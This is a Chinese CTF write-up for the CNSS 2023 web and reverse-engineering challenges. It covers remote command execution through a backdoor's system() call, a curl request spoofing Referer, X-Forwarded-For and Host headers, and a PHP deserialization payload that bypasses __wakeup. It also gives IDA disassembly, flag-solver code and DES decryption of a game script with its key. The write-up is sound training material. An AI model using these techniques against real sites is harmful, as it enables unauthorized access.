cnss2023
Web
[Baby] SignIn
查看源代码,script.js文件中有一段document.getElementById('flag').addEventListener('click', function()下面是一段jsfuck混淆
https://enkhee-osiris.github.io/Decoder-JSFuck/ 得到flag
[Baby] Backdoor
post传system()执行系统命令,找到flag
[Baby] Webpack
https://www.cnblogs.com/guowenrui/p/17023732.html 参考的这个文章
安装nodejs 用reverse-sourcemap .map文件还原找到flag
[Easy] Leak
.swp备份文件 vim -r还原得到flag
[Easy] ezhttp
传参的时候有些问题,像传host还有referer,可能是我这边安装的burp有问题,上网上查了一下发现curl也能传很多参数
curl -X CNSS -A "Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Build/OPM1.171019.026; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4313 MMWEBSDK/20220604 Mobile Safari/537.36 MMWEBID/8603 MicroMessenger/8.0.24.2180(0x28001851) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64" -H "Referer: cnss.io" -H "X-Forwarded-For: 127.0.0.1" -H "Host: uestc.edu.cn" -H "Content-Type: application/json" -d "{\"name\": \"nyyyddddn\",\"password\" : \"123456\"}" -b "name=nyyyddddn;password=123456" -u nyyyddddn:123456 http://124.221.34.13:50005/Index
[Easy] ezunserialize
fssmsl网页那显示错误是unicode里面的LRI PDI RLO的原因,在ide里面没有这种问题,传参的时候转url编码传就行了,只需要改对象数量绕过__wakeup就拿到flag了
<?php
error_reporting(0);
show_source(__FILE__);
include "flag.php";
class CNSS
{
public $username = 'admin';
private $i_want2_say = 'fssmsli_like_web';
protected $password = 'ctf';
function __wakeup()
{
$this->username = 'guest';
$this->i_want2_say = 'i_like_web';
$this->password = '123456';
echo "<br/> wake up! <br/>";
}
function __destruct()
{
echo "destruct<br />";
if ($this->username === 'admin' && $this->password === 'ctf' && $this->i_want2_say === 'fssmsli_like_web') { //wtf
global $flag;
echo $flag;
} else
echo "you are 2 baby la<br/>";
}
}
$aa = new CNSS();
$ss = serialize($aa);
$ss=str_replace('"CNSS":3','"CNSS":4',$ss);
echo urlencode($ss);
Re
[Baby] Welcome to Reverse World!
main函数那,一打开就有flag了
; Attributes: bp-based frame
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near
Str= byte ptr -40h
push rbp
mov rbp, rsp
sub rsp, 60h
call __main
lea rax, [rbp+Str]
mov rdx, rax
lea rcx, Format ; "%s"
call scanf
lea rax, [rbp+Str]
mov rcx, rax ; Str
call strlen
mov rdx, rax
lea rax, [rbp+Str]
mov r8, rdx ; Size
lea rdx, flag ; "cnss{1t_s3ems_l1ke_Y0u_c4n_us3_IDA_n0w!"...
mov rcx, rax ; Buf1
call memcmp
test eax, eax
jnz short loc_401587
[Baby] Find me
; Attributes: bp-based frame
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near
push rbp
mov rbp, rsp
sub rsp, 20h
call __main
lea rcx, aOopsWhereIsMyF ; "Oops! Where is my flag?"
call puts
lea rcx, aLearnAboutStri ; "Learn about Strings and you can see the"...
call puts
lea rcx, aLearnAboutFunc ; "Learn about Functions and you can see t"...
call puts
lea rcx, aLearnAboutXref ; "Learn about Xref and you can see the th"...
call puts
lea rcx, aTheLastPartIsI ; "The last part is _ID4_N0w!}"
call puts
add rsp, 20h
pop rbp
retn
main endp
根据提示,搜字符串cnss{ ,alt+t匹配大小写,找到第一部分cnss{W0w!Y0u',0
查找函数,发现第二部分是函数名_Comp1et3ly_Uns7and_
交叉引用puts找到第三部分
; Attributes: bp-based frame
public sub736
sub736 proc near
push rbp
mov rbp, rsp
sub rsp, 20h
mov ecx, 68h ; 'h' ; Character
call putchar
mov ecx, 30h ; '0' ; Character
call putchar
mov ecx, 77h ; 'w' ; Character
call putchar
mov ecx, 5Fh ; '_' ; Character
call putchar
mov ecx, 74h ; 't' ; Character
call putchar
mov ecx, 30h ; '0' ; Character
call putchar
mov ecx, 5Fh ; '_' ; Character
call putchar
mov ecx, 75h ; 'u' ; Character
call putchar
mov ecx, 73h ; 's' ; Character
call putchar
mov ecx, 33h ; '3' ; Character
call putchar
lea rcx, Buffer ; "Find out which function refer to me!"
call puts
mov eax, 1BF52h
add rsp, 20h
pop rbp
retn
拼接获得flag cnss{W0w!Y0u_Comp1et3ly_Uns7and_h0w_t0_us3_ID4_N0w!}
[Easy] 回レ! 雪月花
int __cdecl main(int argc, const char **argv, const char **envp)
{
int i; // [rsp+Ch] [rbp-34h]
int j; // [rsp+Ch] [rbp-34h]
int k; // [rsp+Ch] [rbp-34h]
char v7[40]; // [rsp+10h] [rbp-30h] BYREF
unsigned __int64 v8; // [rsp+38h] [rbp-8h]
v8 = __readfsqword(0x28u);
puts("Please input your flag:");
__isoc99_scanf("%s", v7);
for ( i = 0; i <= 31; ++i )
v7[i] ^= 0x11u;
for ( j = 0; j <= 28; ++j )
encode(&v7[j], &v7[j + 1], &v7[j + 2], &v7[j + 3]);
for ( k = 0; k <= 31 && v7[k] == cipher[k]; ++k )
;
if ( k == 32 )
puts("Correct!");
else
puts("Wrong!");
return 0;
}
这种逆向题倒过来看会很直观,分三层,把输入的字符串异或上0x11u,然后encode一遍,和cipher判断,一致获得flag
_BYTE *__fastcall encode(_BYTE *a1, _BYTE *a2, _BYTE *a3, _BYTE *a4)
{
_BYTE *result; // rax
char v5; // [rsp+2Ch] [rbp-4h]
char v6; // [rsp+2Dh] [rbp-3h]
char v7; // [rsp+2Eh] [rbp-2h]
char v8; // [rsp+2Fh] [rbp-1h]
v5 = (*a1 << 7) | (*a2 >> 1);
v6 = ((*a4 >> 2) | (*a3 << 6)) ^ v5;
v7 = ((*a1 >> 1) | (*a2 << 7)) ^ v6;
v8 = ((*a3 >> 2) | (*a4 << 6)) ^ v7;
*a1 = v5;
*a2 = v6;
*a3 = v7;
result = a4;
*a4 = v8;
return result;
}
看了半天了不太会,去掉异或之后其他的不知道怎么做了
搜了一下发现这好像是往年题,做法是把异或去掉后,根据a1 a2 a3 a4的顺序倒着做一遍就好了
#include <cstdio>
int c[] = {
63,143,163,188,141,39,122,103,226,3,162,224,
172,234,149,139,163,237,204,182,50,140,148,82,
130,138,20,198,245,174,104,115,0
};
int main()
{
for (int i = 28; i >= 0; i--)
{
c[i + 3] ^= c[i + 2];
c[i + 2] ^= c[i + 1];
c[i + 1] ^= c[i + 0];
int p[4];
p[0] = ((c[i + 2] & 127) << 1) | (c[i] >> 7);
p[1] = ((c[i] & 127) << 1) | (c[i + 2] >> 7);
p[2] = ((c[i + 3] & 63) << 2) | (c[i + 1] >> 6);
p[3] = ((c[i + 1] & 63) << 2) | (c[i + 3] >> 6);
for (int j = 0; j < 4; j++)
c[i + j] = p[j];
}
for (int i = 0; i < 32; i++)
putchar(c[i] ^ 17);
puts("");
return 0;
}
[Easy] 邪王真眼
encode 3和4 然后还有一个alpha的索引表,应该是base64 然后替换了索引表
__int64 __fastcall encode(char *a1, int a2, _BYTE *a3, int *a4)
{
int v5; // esi
int v6; // esi
int v7; // esi
int v8; // [rsp+30h] [rbp-20h]
int v9; // [rsp+34h] [rbp-1Ch]
int i; // [rsp+3Ch] [rbp-14h]
int v12; // [rsp+4Ch] [rbp-4h]
char *v13; // [rsp+70h] [rbp+20h]
v13 = a1;
if ( !a1 || !a2 )
return 0xFFFFFFFFi64;
v12 = 0;
if ( a2 % 3 )
v12 = 3 - a2 % 3;
v9 = a2 + v12;
v8 = 8 * (a2 + v12) / 6;
for ( i = 0; i < v9; i += 3 )
{
*a3 = alpha[*v13 >> 2];
if ( a2 + v12 - 3 == i && v12 )
{
if ( v12 == 1 )
{
v5 = (char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64);
a3[1] = alpha[v5 + (char)cmove_bits((unsigned __int8)v13[1], 0i64, 4i64)];
a3[2] = alpha[(char)cmove_bits((unsigned __int8)v13[1], 4i64, 2i64)];
a3[3] = 61;
}
else if ( v12 == 2 )
{
a3[1] = alpha[(char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64)];
a3[2] = 61;
a3[3] = 61;
}
}
else
{
v6 = (char)cmove_bits((unsigned __int8)*v13, 6i64, 2i64);
a3[1] = alpha[v6 + (char)cmove_bits((unsigned __int8)v13[1], 0i64, 4i64)];
v7 = (char)cmove_bits((unsigned __int8)v13[1], 4i64, 2i64);
a3[2] = alpha[v7 + (char)cmove_bits((unsigned __int8)v13[2], 0i64, 6i64)];
a3[3] = alpha[v13[2] & 0x3F];
}
a3 += 4;
v13 += 3;
}
if ( a4 )
*a4 = v8;
return 0i64;
}
用这个网站http://web.chacuo.net/netbasex把alpha索引表加上去,解密UR3oWS5E0G03tRibWRrR0cEx拿到flag
[Mid] 恭喜你获得了flag提现机会!
ida中patch program修改然后直接call outputflag就拿到flag了
[Mid] Pyfuck
x = [~((((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~(((((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),~((~((~(((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),((~((((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))),(~((~((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))),~(((~((~((~((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~(((~(((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),((((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))),~((~((~((~((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))),~(((~(((((-~([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))),~((~((((~((((~(([]<[]))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))),(~(((~(((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))),~((~(((~((~((~(((~(([]<[]))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))<<(-~([]<[]))))]
flag = input("flag: ")
if len(flag) == 31:
for i in range(len(flag)):
if (ord(flag[i])^((~((~(((-~([]<[]))<<(-~([]<[]))))<<(-~([]<[]))))<<(-~([]<[])))<<(-~([]<[]))))!=x[i]:
print("Wrong")
exit()
print("Correct")
else:
print("Wrong")
这个挺有意思的[]<[]产生一个0然后用各种位运算。只需要x[]异或上if判断中的
(((((((-([]<[]))<<(-([]<[]))))<<(-([]<[]))))<<(-([]<[])))<<(-~([]<[]))))然后chr输出就拿到flag了
[Mid] diannaobaozhale
main proc near
var_5 = byte ptr -5
var_4 = dword ptr -4
; __unwind {
endbr64
push rbp
mov rbp, rsp
sub rsp, 10h
mov [rbp+var_5], 63
mov edi, 63h
call _putchar
mov edi, 6Eh
call _putchar
mov edi, 73h
call _putchar
mov edi, 73h
call _putchar
mov edi, 7Bh
call _putchar
mov [rbp+var_4], 0
jmp short loc_11B0
; ---------------------------------------------------------------------------
loc_1194:
movsx eax, [rbp+var_5]
mov edi, eax ;
call _putchar
movzx eax, [rbp+var_5]
add eax, 2
xor eax, 1
mov [rbp+var_5], al
add [rbp+var_4], 1
loc_11B0:
cmp [rbp+var_4], 9
jle short loc_1194
mov edi, 7Dh
call _putchar
mov eax, 0
leave
retn
; }
main endp
__putchar输出字符
63h 6Eh 73h 73h 7Bh 对应cnss{
cmp [rbp+var_4], 9 jle short loc_1194以及add [rbp+var_4], 1
就是一个九次的循环
7Dh对应 }
#include <cstdio>
int main()
{
putchar('c');
putchar('n');
putchar('s');
putchar('s');
putchar('{');
char rbpvar5 = 'c';
for (int i = 0; i <= 9; i++)
{
putchar(rbpvar5);
rbpvar5 += 2; rbpvar5 ^= 1;
}
putchar('}');
putchar('\n');
return 0;
}
拿到flag cnss{cdghklopst}
[Hard] Shino 的心跳大冒险
玩了一下发现flag被挡住了,看目录里面有好几个Yuri关键词,搜索了一下发现
https://github.com/rinkako/YuriAVGEngine这个项目
看了下简洁这个游戏引擎是基于虚拟机的,有个main.sil是存放游戏逻辑的中间码的,但是被加密了,像是base64加密,用在线的base64解密发现乱码
继续翻项目,发现有个yuriricli是用来编译项目的,下载源码看看里面是怎么加密的
using System.Text;
namespace Yuri.YuriInterpreter
{
/// <summary>
/// 加密解密类
/// </summary>
public static class YuriEncryptor
{
/// <summary>
/// 对一个字符串做DES加密
/// </summary>
/// <param name="data">要加密的数据</param>
/// <param name="key">私钥</param>
/// <returns>加密完毕的字符串</returns>
public static string EncryptString(string data, string key)
{
string str = string.Empty;
if (string.IsNullOrEmpty(data))
{
return str;
}
MemoryStream ms = new MemoryStream();
byte[] myKey = Encoding.UTF8.GetBytes(key);
byte[] myIV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
DES myProvider = new DESCryptoServiceProvider();
CryptoStream cs = new CryptoStream(ms, myProvider.CreateEncryptor(myKey, myIV), CryptoStreamMode.Write);
try
{
byte[] bs = Encoding.UTF8.GetBytes(data);
cs.Write(bs, 0, bs.Length);
cs.FlushFinalBlock();
str = Convert.ToBase64String(ms.ToArray());
}
finally
{
cs.Close();
ms.Close();
}
return str;
}
/// <summary>
/// 对一个字符串做DES解密
/// </summary>
/// <param name="data">要解密的数据</param>
/// <param name="key">私钥</param>
/// <returns>解密完毕的字符串</returns>
public static string DecryptString(string data, string key)
{
string str = string.Empty;
if (string.IsNullOrEmpty(data))
{
throw new Exception("data is empty");
}
MemoryStream ms = new MemoryStream();
byte[] myKey = Encoding.UTF8.GetBytes(key);
byte[] myIV = { 0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF };
DES myProvider = new DESCryptoServiceProvider();
CryptoStream cs = new CryptoStream(ms, myProvider.CreateDecryptor(myKey, myIV), CryptoStreamMode.Write);
try
{
byte[] bs = Convert.FromBase64String(data);
cs.Write(bs, 0, bs.Length);
cs.FlushFinalBlock();
str = Encoding.UTF8.GetString(ms.ToArray());
}
finally
{
cs.Close();
ms.Close();
}
return str;
}
}
}
这个是des加密的,下面还有解密函数,就在窗口load那调用了一下
private void CPMainForm_Load(object sender, EventArgs e)
{
String path = "D:\\dw_file\\cnss\\CNSS Rev Challenge\\Scenario\\main.sil";
foreach (string encryptedData in File.ReadLines(path))
{
string key = "yurayuri";
string decryptedData = YuriEncryptor.DecryptString(encryptedData, key);
Console.WriteLine(decryptedData);
}
}
解密出来的文本是这样的
main_0@NOP^^^^main_0@act_bgm#main_1@act_bg#main_2@act_se#main_4@act_dialog#main_6@act_cstand#main_7@act_se#main_9@act_dialog#main_11@act_deletecstand#main_12@act_se#main_14@act_dialog#main_16@act_se#main_18@act_dialog#main_20@act_stopbgm#main_21@act_cstand#main_22@act_se#main_24@act_dialog#main_26@act_bgm#main_27@act_se#main_29@act_dialog#main_31@act_se#main_33@act_dialog#main_35@act_se#main_37@act_dialog#main_39@act_deletecstand#main_40@act_bg#main_41@act_se#main_43@act_dialog#main_45@act_se#main_47@act_dialog#main_49@act_se#main_51@act_dialog#main_53@act_se#main_55@act_dialog#main_57@act_se#main_59@act_dialog#main_61@act_se#main_63@act_dialog#main_65@act_se#main_66@act_bg#main_67@act_wait#main_68@act_bg#main_69@act_cstand#main_71@act_dialog#main_73@act_deletecstand#main_74@act_se#main_75@act_bg#main_76@act_wait#main_77@act_se#main_78@act_bg#main_79@act_wait#main_80@act_bg#main_81@act_stopbgm#main_82@act_cstand#main_83@act_se#main_85@act_dialog#main_87@act_bg#main_88@act_bgm#main_89@act_deletecstand#main_90@act_cstand#main_91@act_se#main_93@act_dialog#main_95@act_se#main_97@act_dialog#main_99@act_se#main_101@act_dialog#main_103@act_se#main_105@act_dialog#main_107@act_se#main_109@act_dialog#main_111@act_se#main_113@act_dialog#main_115@act_se#main_117@act_dialog#main_119@act_se#main_121@act_dialog#main_123@act_se#main_125@act_dialog#main_127@act_se#main_129@act_dialog#main_131@act_deletecstand#main_132@act_picture#main_133@act_se#main_135@act_dialog#main_137@act_se#main_139@act_dialog#main_142@act_dialog#main_144@act_deletepicture#main_145@act_se#main_147@act_dialog#main_150@act_dialog#main_152@act_shutdown^^0^^109097105110
main_0@act_bgm^filename@050053046109112051#vol@052057056^^main_1@act_bg^^^0^^048045048
main_1@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_2@act_se^^^0^^049045048
main_2@act_se^filename@121117107117109111095048048048049046109112051#vol@056048048^^main_4@act_dialog^^^0^^050045048
main_4@act_dialog^^^main_6@act_cstand^^^0^^083104105110111058227128142230136145229143171032083104105110111239188140230152175228184128229144141229136154229136154229133165229173166231148181229173144231165158230138128229164167229173166231154132232174161231174151230156186229176143231153189227128130227128143013010035048
main_6@act_cstand^id@048#name@083104105110111#face@049#x@049051048#y@049051048#loc@^^main_7@act_se^^^0^^054045048
main_7@act_se^filename@121117107117109111095048048048050046109112051#vol@056048048^^main_9@act_dialog^^^0^^055045048
main_9@act_dialog^^^main_11@act_deletecstand^^^0^^083104105110111058032227128142232191153230152175230136145239188140233149191231155184232141137231142135239188140228189134229175140230156137231165158231167152230132159227128130227128143013010035048
main_11@act_deletecstand^id@048^^main_12@act_se^^^0^^049049045048
main_12@act_se^filename@121117107117109111095048048048051046109112051#vol@056048048^^main_14@act_dialog^^^0^^049050045048
main_14@act_dialog^^^main_16@act_se^^^0^^083104105110111058032227128142231142176229156168230136145230173163231171153229156168230160161233151168229143163227128130228187164228186186229144145229190128231154132229164167229173166231148159230180187230136145230157165229149166239188129227128143013010035048
main_16@act_se^filename@121117107117109111095048048048052046109112051#vol@056048048^^main_18@act_dialog^^^0^^049054045048
main_18@act_dialog^^^main_20@act_stopbgm^^^0^^083104105110111058032227128142231173137231173137239188140233130163230152175228187128228185136239188159227128143013010035048
main_20@act_stopbgm^^^main_21@act_cstand^^^0^^050048045048
main_21@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_22@act_se^^^0^^050049045048
main_22@act_se^filename@121117107117109111095048048048053046109112051#vol@056048048^^main_24@act_dialog^^^0^^050050045048
main_24@act_dialog^^^main_26@act_bgm^^^0^^083104105110111058032227128142231156139232181183230157165230156137231130185229131143046046046046230136145232135170229183177239188159227128143013010035048
main_26@act_bgm^filename@050057046109112051#vol@053048050^^main_27@act_se^^^0^^050054045048
main_27@act_se^filename@121117107117109111095048048048054046109112051#vol@056048048^^main_29@act_dialog^^^0^^050055045048
main_29@act_dialog^^^main_31@act_se^^^0^^239188159239188159239188159239188154227128142229141131228184135232166129229176143229191131046046046227128143013010035048
main_31@act_se^filename@121117107117109111095048048048055046109112051#vol@056048048^^main_33@act_dialog^^^0^^051049045048
main_33@act_dialog^^^main_35@act_se^^^0^^239188159239188159239188159239188154227128142232191155229133165230160161229155173229144142239188140229143175232131189228188154230156137228184128228184170229165135230128170231154132229165179228186186230137190228184138228189160227128130227128143013010035048
main_35@act_se^filename@121117107117109111095048048048056046109112051#vol@056048048^^main_37@act_dialog^^^0^^051053045048
main_37@act_dialog^^^main_39@act_deletecstand^^^0^^239188159239188159239188159239188154227128142229165185230136180231157128231187191232137178229184189229173144239188140228184128229164180231153189229143145227128130232153189231132182231156139232181183230157165229190136229143175231136177239188140228189134229133182229174158232131140229144142230156137228184128228184170229188186229164167231154132231165158231167152231187132231187135227128130227128143013010035048
main_39@act_deletecstand^id@048^^main_40@act_bg^^^0^^051057045048
main_40@act_bg^id@049#filename@067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_41@act_se^^^0^^052048045048
main_41@act_se^filename@121117107117109111095048048048057046109112051#vol@056048048^^main_43@act_dialog^^^0^^052049045048
main_43@act_dialog^^^main_45@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180230142165232167166228186134232191153228184170231165158231167152231187132231187135231154132228186186239188140233131189230151160228184128228190139229164150229156176232142183229190151228186134229188186229164167231154132229138155233135143227128130227128143013010035048
main_45@act_se^filename@121117107117109111095048048049048046109112051#vol@056048048^^main_47@act_dialog^^^0^^052053045048
main_47@act_dialog^^^main_49@act_se^^^0^^239188159239188159239188159239188154227128142230184151233128143230181139232175149227128129232189175228187182231160180232167163227128129229188128229143145232191144231187180046046046230149176228184141230184133231154132233171152231171175231165158231167152230138128230156175229156168232191153228184170231187132231187135233135140228187163228187163231155184228188160227128130227128143013010035048
main_49@act_se^filename@121117107117109111095048048049049046109112051#vol@056048048^^main_51@act_dialog^^^0^^052057045048
main_51@act_dialog^^^main_53@act_se^^^0^^239188159239188159239188159239188154227128142229144132231167141229165150233161185229165150233135145227128129228191157231160148229138160229136134227128129229164167229142130111102102101114239188140229133168233131189232162171232191153228184170231187132231187135231154132228186186230143161229156168230137139228184173227128130227128143013010035048
main_53@act_se^filename@121117107117109111095048048049050046109112051#vol@056048048^^main_55@act_dialog^^^0^^053051045048
main_55@act_dialog^^^main_57@act_se^^^0^^239188159239188159239188159239188154227128142229144172232175180228187150228187172232191152228188154231187143229184184228184190229138158228184128231167141231165158231167152228187170229188143239188140228184128231190164228186186229155180229156168229165182232140182229186151230151129232190185231148168228184141231159165233129147229147170233135140230157165231154132229164167233135143231187143232180185229164167229150157231137185229150157227128130227128143013010035048
main_57@act_se^filename@121117107117109111095048048049051046109112051#vol@056048048^^main_59@act_dialog^^^0^^053055045048
main_59@act_dialog^^^main_61@act_se^^^0^^239188159239188159239188159239188154227128142233130163228184170229165179228186186232191152228188154230139191230137128232176147032102108097103032230157165232175177230131145228189160227128130230136145229183178231187143229129183229129183230139191229136176228186134233130163228184170228184156232165191227128130227128143013010035048
main_61@act_se^filename@121117107117109111095048048049052046109112051#vol@056048048^^main_63@act_dialog^^^0^^054049045048
main_63@act_dialog^^^main_65@act_se^^^0^^239188159239188159239188159239188154227128142230136145232191153229176177230138138229174131229145138232175137228189160239188140229141131228184135228184141232166129231157128228186134229165185231154132233129147239188129227128143013010035048
main_65@act_se^filename@121117107117109111095048048049053046109112051#vol@056048048^^main_66@act_bg^^^0^^054053045048
main_66@act_bg^id@049#filename@099111110118101114049046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_67@act_wait^^^0^^054054045048
main_67@act_wait^time@051048048048^^main_68@act_bg^^^0^^054055045048
main_68@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_69@act_cstand^^^0^^054056045048
main_69@act_cstand^id@049#name@083104105110111#face@050#x@049051048#y@049051048#loc@^^main_71@act_dialog^^^0^^054057045048
main_71@act_dialog^^^main_73@act_deletecstand^^^0^^239188129239188129013010035048
main_73@act_deletecstand^id@048^^main_74@act_se^^^0^^055051045048
main_74@act_se^filename@121117107117109111095048048049054046109112051#vol@056048048^^main_75@act_bg^^^0^^055052045048
main_75@act_bg^id@049#filename@099111110118101114050046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_76@act_wait^^^0^^055053045048
main_76@act_wait^time@051048048048^^main_77@act_se^^^0^^055054045048
main_77@act_se^filename@121117107117109111095048048049055046109112051#vol@056048048^^main_78@act_bg^^^0^^055055045048
main_78@act_bg^id@049#filename@079110108121067078083083046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_79@act_wait^^^0^^055056045048
main_79@act_wait^time@049053048048048^^main_80@act_bg^^^0^^055057045048
main_80@act_bg^id@049#filename@098108097110107046112110103#x@#y@#opacity@#xscale@#yscale@#ro@045051048^^main_81@act_stopbgm^^^0^^056048045048
main_81@act_stopbgm^^^main_82@act_cstand^^^0^^056049045048
main_82@act_cstand^id@048#name@083104105110111#face@051#x@049051048#y@049051048#loc@^^main_83@act_se^^^0^^056050045048
main_83@act_se^filename@121117107117109111095048048049056046109112051#vol@056048048^^main_85@act_dialog^^^0^^056051045048
main_85@act_dialog^^^main_87@act_bg^^^0^^083104105110111058227128142231165158226128148226128148231167152226128148226128148228186186226128148226128148227128143013010035048
main_87@act_bg^id@049#filename@100111111114046106112103#x@#y@#opacity@#xscale@#yscale@#ro@045050053^^main_88@act_bgm^^^0^^056055045048
main_88@act_bgm^filename@050053046109112051#vol@052057056^^main_89@act_deletecstand^^^0^^056056045048
main_89@act_deletecstand^id@048^^main_90@act_cstand^^^0^^056057045048
main_90@act_cstand^id@048#name@067078083083#face@049#x@049051048#y@049051048#loc@^^main_91@act_se^^^0^^057048045048
main_91@act_se^filename@121117107117109111095048048049057046109112051#vol@056048048^^main_93@act_dialog^^^0^^057049045048
main_93@act_dialog^^^main_95@act_se^^^0^^229143175231136177231154132229165179229173169058227128142228184141229143175228187165229144172228187150231158142232175180229147166227128130227128143013010035048
main_95@act_se^filename@121117107117109111095048048050048046109112051#vol@056048048^^main_97@act_dialog^^^0^^057053045048
main_97@act_dialog^^^main_99@act_se^^^0^^083104105110111058227128142231187191232137178229184189229173144239188140228184128229164180231153189229143145239188140231156139232181183230157165229190136229143175231136177046046046046046033033033033227128143013010035048
main_99@act_se^filename@121117107117109111095048048050049046109112051#vol@056048048^^main_101@act_dialog^^^0^^057057045048
main_101@act_dialog^^^main_103@act_se^^^0^^083104105110111058227128142233154190233129147228189160229176177230152175226128148226128148227128143013010035048
main_103@act_se^filename@121117107117109111095048048050050046109112051#vol@056048048^^main_105@act_dialog^^^0^^049048051045048
main_105@act_dialog^^^main_107@act_se^^^0^^083104105110111058227128142228184150231149140231172172228184128229143175231136177231154132032067078083083032229168152239188129227128143013010035048
